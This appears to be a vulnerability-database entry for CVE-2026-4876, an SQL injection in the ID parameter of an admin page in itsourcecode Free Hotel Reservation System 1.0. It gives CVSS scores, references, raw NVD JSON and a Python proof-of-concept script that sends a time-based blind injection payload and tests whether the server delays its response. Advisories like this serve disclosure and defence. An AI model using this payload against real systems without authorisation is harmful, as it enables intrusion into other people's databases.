CVE-2026-4876

Description

A vulnerability was identified in itsourcecode Free Hotel Reservation System 1.0. The impacted element is an unknown function of the file /admin/mod_amenities/index.php?view=editpic. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

itsourcecode Free Hotel Reservation System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_sqli_vulnerability(target_host):
    """
    PoC for CVE-2026-4876 SQL Injection Vulnerability
    Target: itsourcecode Free Hotel Reservation System 1.0
    File: /admin/mod_amenities/index.php?view=editpic
    Parameter: ID
    """
    url = f"{target_host}/admin/mod_amenities/index.php"
    # Using a basic time-based blind SQL injection payload for demonstration
    payload = "1' AND SLEEP(5)-- -"
    
    params = {
        "view": "editpic",
        "ID": payload
    }
    
    try:
        print(f"[*] Sending request to: {url}")
        response = requests.get(url, params=params, timeout=10)
        
        # Check if the response time indicates a delay caused by SLEEP(5)
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability confirmed: The application responded with a delay.")
            print("[+] This indicates that the SQL payload was executed by the backend database.")
        else:
            print("[-] Vulnerability not detected or target is not vulnerable.")
            print(f"[-] Response time: {response.elapsed.total_seconds()} seconds")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error during request: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://127.0.0.1"
    check_sqli_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4876
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4876
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4876/
[4] VulDB https://vuldb.com/cve/CVE-2026-4876
[5] https://github.com/bybinyu/Vulnerability-Practice/issues/5
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.353559
[8] https://vuldb.com/?id.353559
[9] https://vuldb.com/?submit.777352

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4876", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:14.267", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in itsourcecode Free Hotel Reservation System 1.0. The impacted element is an unknown function of the file /admin/mod_amenities/index.php?view=editpic. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en itsourcecode Free Hotel Reservation System 1.0. El elemento impactado es una función desconocida del archivo /admin/mod_amenities/index.php?view=editpic. Tal manipulación del argumento ID lleva a inyección SQL. El ataque puede ser realizado desde remoto. El exploit está disponible públicamente y podría ser usado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/bybinyu/Vulnerability-Practice/issues/5", "source": "[email protected]"}, {"url": "https://itsourcecode.com/", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.353559", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.353559", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.777352", "source": "[email protected]"}]}}